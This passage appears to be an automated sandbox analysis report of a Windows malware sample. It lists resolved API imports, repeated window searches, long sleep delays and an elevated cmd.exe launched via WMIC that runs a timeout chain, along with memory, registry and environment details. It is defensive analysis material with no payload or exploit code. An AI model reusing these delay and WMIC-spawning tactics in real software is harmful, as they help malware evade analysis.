Get Address	c:\windows\system32\kernel32.dll	function = FileTimeToLocalFileTime, address_out = 0x753c2004	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FileTimeToDosDateTime, address_out = 0x753b2ce1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = EnumCalendarInfoA, address_out = 0x753d6180	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateThread, address_out = 0x753c375d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateProcessA, address_out = 0x75372082	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x753bcee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateEventA, address_out = 0x753b0ef7	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CompareStringA, address_out = 0x753b0f4a	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\version.dll	function = VerQueryValueA, address_out = 0x745c1b72	1	Fn
Get Address	c:\windows\system32\version.dll	function = GetFileVersionInfoSizeA, address_out = 0x745c1c9c	1	Fn
Get Address	c:\windows\system32\version.dll	function = GetFileVersionInfoA, address_out = 0x745c1ced	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = UnrealizeObject, address_out = 0x7588fb63	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = StretchBlt, address_out = 0x7588f467	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetWindowOrgEx, address_out = 0x75888546	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetViewportOrgEx, address_out = 0x7588834f	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetTextColor, address_out = 0x75886906	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetStretchBltMode, address_out = 0x75887705	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetROP2, address_out = 0x7588f9e0	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetPixel, address_out = 0x758a14f3	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetDIBColorTable, address_out = 0x758a1492	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetBrushOrgEx, address_out = 0x7588c4c5	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetBkMode, address_out = 0x758869b1	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SetBkColor, address_out = 0x75886a3c	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SelectPalette, address_out = 0x7588a1f6	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SelectObject, address_out = 0x75886640	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = SaveDC, address_out = 0x7588a74b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = RestoreDC, address_out = 0x7588a67b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = RectVisible, address_out = 0x75888f13	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = RealizePalette, address_out = 0x7588ef91	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = PatBlt, address_out = 0x758862af	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = MoveToEx, address_out = 0x75888c21	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = MaskBlt, address_out = 0x7588c7ad	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = LineTo, address_out = 0x7588f59b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = IntersectClipRect, address_out = 0x75887dfe	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetWindowOrgEx, address_out = 0x7588d1bf	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetTextMetricsA, address_out = 0x7588d0f2	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetTextExtentPoint32A, address_out = 0x758907b0	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetSystemPaletteEntries, address_out = 0x7588c2e1	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetStockObject, address_out = 0x75885ddf	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetPixel, address_out = 0x7588c3d5	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetPaletteEntries, address_out = 0x7588c2aa	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetObjectA, address_out = 0x7588914f	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDeviceCaps, address_out = 0x75886f7f	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDIBits, address_out = 0x7588a23b	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDIBColorTable, address_out = 0x7588a149	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetDCOrgEx, address_out = 0x7588fa75	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetCurrentPositionEx, address_out = 0x75888d78	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetClipBox, address_out = 0x75888525	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetBrushOrgEx, address_out = 0x7588c943	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = GetBitmapBits, address_out = 0x7588c1ba	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = ExcludeClipRect, address_out = 0x75889218	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = DeleteObject, address_out = 0x75885f14	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = DeleteDC, address_out = 0x75886eaa	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateSolidBrush, address_out = 0x75886b49	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreatePenIndirect, address_out = 0x7589744d	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreatePalette, address_out = 0x7588b1b0	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateHalftonePalette, address_out = 0x7588c2cd	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateFontIndirectA, address_out = 0x7588d22d	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateDIBitmap, address_out = 0x7588a379	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateDIBSection, address_out = 0x75888850	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateCompatibleDC, address_out = 0x75886888	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x758873ad	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateBrushIndirect, address_out = 0x7588993c	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = CreateBitmap, address_out = 0x75886b79	1	Fn
Get Address	c:\windows\system32\gdi32.dll	function = BitBlt, address_out = 0x758872c0	1	Fn
Get Address	c:\windows\system32\user32.dll	function = CreateWindowExA, address_out = 0x757bbf40	1	Fn
Get Address	c:\windows\system32\user32.dll	function = WindowFromPoint, address_out = 0x757e6be9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = WinHelpA, address_out = 0x757d471e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = WaitMessage, address_out = 0x757c66bd	1	Fn
Get Address	c:\windows\system32\user32.dll	function = UpdateWindow, address_out = 0x757bffa8	1	Fn
Get Address	c:\windows\system32\user32.dll	function = UnregisterClassA, address_out = 0x757b8d70	1	Fn
Get Address	c:\windows\system32\user32.dll	function = UnhookWindowsHookEx, address_out = 0x757badf9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = TranslateMessage, address_out = 0x757c64c7	1	Fn
Get Address	c:\windows\system32\user32.dll	function = TranslateMDISysAccel, address_out = 0x757e1a5a	1	Fn
Get Address	c:\windows\system32\user32.dll	function = TrackPopupMenu, address_out = 0x757d2228	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SystemParametersInfoA, address_out = 0x757b80e0	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowWindow, address_out = 0x757bf2a9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowScrollBar, address_out = 0x757e3c89	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowOwnedPopups, address_out = 0x757e28ca	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ShowCursor, address_out = 0x757b64d3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowsHookExA, address_out = 0x757e6d0c	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowPos, address_out = 0x757c1bc4	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowPlacement, address_out = 0x757b7f78	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetWindowLongA, address_out = 0x757b8ba3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetTimer, address_out = 0x757c52ef	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetScrollRange, address_out = 0x757b8ec5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetScrollPos, address_out = 0x757e04be	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetScrollInfo, address_out = 0x757c48da	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetRect, address_out = 0x757c498b	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetPropA, address_out = 0x757e28e5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetParent, address_out = 0x757b8314	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetMenuItemInfoA, address_out = 0x757d6d15	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetMenu, address_out = 0x757e6b0e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetForegroundWindow, address_out = 0x757bb225	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetFocus, address_out = 0x757babad	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetCursor, address_out = 0x757c3075	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetClassLongA, address_out = 0x757e1236	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetCapture, address_out = 0x757e6932	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetActiveWindow, address_out = 0x757c333a	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SendMessageA, address_out = 0x757bad60	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ScrollWindow, address_out = 0x757dfc1d	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ScreenToClient, address_out = 0x757ba506	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RemovePropA, address_out = 0x757e2551	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RemoveMenu, address_out = 0x757b86e8	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ReleaseDC, address_out = 0x757c5421	1	Fn
Get Address	c:\windows\system32\user32.dll	function = ReleaseCapture, address_out = 0x757e69f2	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RegisterWindowMessageA, address_out = 0x757bc091	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RegisterClipboardFormatA, address_out = 0x757bc091	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RegisterClassA, address_out = 0x757bbc6a	1	Fn
Get Address	c:\windows\system32\user32.dll	function = RedrawWindow, address_out = 0x757c29bc	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PtInRect, address_out = 0x757c2392	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PostQuitMessage, address_out = 0x757bb308	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PostMessageA, address_out = 0x757bb446	1	Fn
Get Address	c:\windows\system32\user32.dll	function = PeekMessageA, address_out = 0x757c19a5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = OffsetRect, address_out = 0x757ccdab	1	Fn
Get Address	c:\windows\system32\user32.dll	function = OemToCharA, address_out = 0x7580f041	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MapWindowPoints, address_out = 0x757c5caa	1	Fn
Get Address	c:\windows\system32\user32.dll	function = MapVirtualKeyA, address_out = 0x757e6038	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadKeyboardLayoutA, address_out = 0x757fc892	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadIconA, address_out = 0x757b64ad	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadCursorA, address_out = 0x757b8328	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadBitmapA, address_out = 0x757e1608	1	Fn
Get Address	c:\windows\system32\user32.dll	function = KillTimer, address_out = 0x757c64f7	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsZoomed, address_out = 0x757c4ce9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsWindowVisible, address_out = 0x757c4d69	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsWindowEnabled, address_out = 0x757ba9b9	1	Fn
Get Address	c:\windows\system32\user32.dll	function = IsWindow, address_out = 0x757c53ba	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	1	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	1	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	1	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = InitializeFlatSB, address_out = 0x73f6f803	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = UninitializeFlatSB, address_out = 0x73e9d1ea	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x73f6f81f	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x73f107d0	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x73f6f84b	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x73f6f83a	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x73f6f829	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x73f108b6	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x73f6f80e	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x73f10894	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x73f108c7	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x73f108a5	1	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	1	Fn

Window (19)

»

Operation	Window Name	Additional Information	Success	Count	Logfile
Find	marxvxinhhm0131	-		19	Fn

Keyboard (3)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	1	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Get Info	type = KB_LOCALE_ID	1	Fn

System (39)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = 59214 milliseconds (59.214 seconds)	19	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:13 (UTC)	1	Fn
Get Time	type = Ticks, time = 143801	1	Fn
Get Info	type = Operating System	7	Fn
Get Info	type = Hardware Information	4	Fn
Get Info	type = Operating System	7	Fn

Process #26: cmd.exe

64

0

»

Information	Value
ID	#26
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /k echo %time% && timeout 4000 > NUL && exit
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:04:31, Reason: Terminated by Timeout
Monitor Duration	00:03:06

OS Process Information

»

Information	Value
PID	0xf24
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F28

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	rw	-
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	rw	-
pagefile_0x0000000000350000	0x00350000	0x00417fff	Pagefile Backed Memory	r	-
private_0x00000000004e0000	0x004e0000	0x004effff	Private Memory	rw	-
pagefile_0x00000000004f0000	0x004f0000	0x005f0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000600000	0x00600000	0x011fffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001200000	0x01200000	0x01362fff	Pagefile Backed Memory	r	-
cmd.exe	0x4a720000	0x4a76bfff	Memory Mapped File	rwx	-
winbrand.dll	0x6cdf0000	0x6cdf6fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (23)

»

Operation	Filename	Additional Information	Count	Logfile
Create	NUL	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	3	Fn
Open	STD_OUTPUT_HANDLE	-	14	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data

Registry (17)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (8)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\cmd.exe	base_address = 0x4a720000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Filename	-	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CopyFileExW, address_out = 0x753aac6c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x753b3ea8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x753c2732	1	Fn

System (3)

»

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-10-22 05:27:13 (UTC)		2	Fn
Get Time	type = Ticks, time = 144035		1	Fn

Environment (11)

»

Operation	Additional Information	Count	Logfile
Get Environment String	-	3	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	2	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Get Environment String	name = time	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #27: timeout.exe

2004

0

»

Information	Value
ID	#27
File Name	c:\windows\system32\timeout.exe
Command Line	timeout 4000
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:04:31, Reason: Terminated by Timeout
Monitor Duration	00:03:06

OS Process Information

»

Information	Value
PID	0xf40
Parent PID	0xf24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F44

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
timeout.exe.mui	0x000e0000	0x000e1fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
timeout.exe	0x00180000	0x00189fff	Memory Mapped File	rwx	-
private_0x0000000000250000	0x00250000	0x0028ffff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x003effff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x004b7fff	Pagefile Backed Memory	r	-
private_0x0000000000550000	0x00550000	0x0055ffff	Private Memory	rw	-
pagefile_0x0000000000560000	0x00560000	0x00660fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000670000	0x00670000	0x0126ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01270000	0x0153efff	Memory Mapped File	r	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
ws2_32.dll	0x756c0000	0x756f4fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
nsi.dll	0x76f10000	0x76f15fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

File (562)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	186	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	373	Fn

Module (2)

»

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\system32\timeout.exe	base_address = 0x180000		1	Fn
Get Filename	-	process_name = c:\windows\system32\timeout.exe, file_name_orig = C:\Windows\system32\timeout.exe, size = 260		1	Fn

System (1440)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = 100 milliseconds (0.100 seconds)	1438	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:13 (UTC)	1	Fn
Get Time	type = Ticks, time = 144394	1	Fn

Process #28: userinit.exe

233

0

»

Information	Value
ID	#28
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:26, Reason: Child Process
Unmonitor	End Time: 00:01:31, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

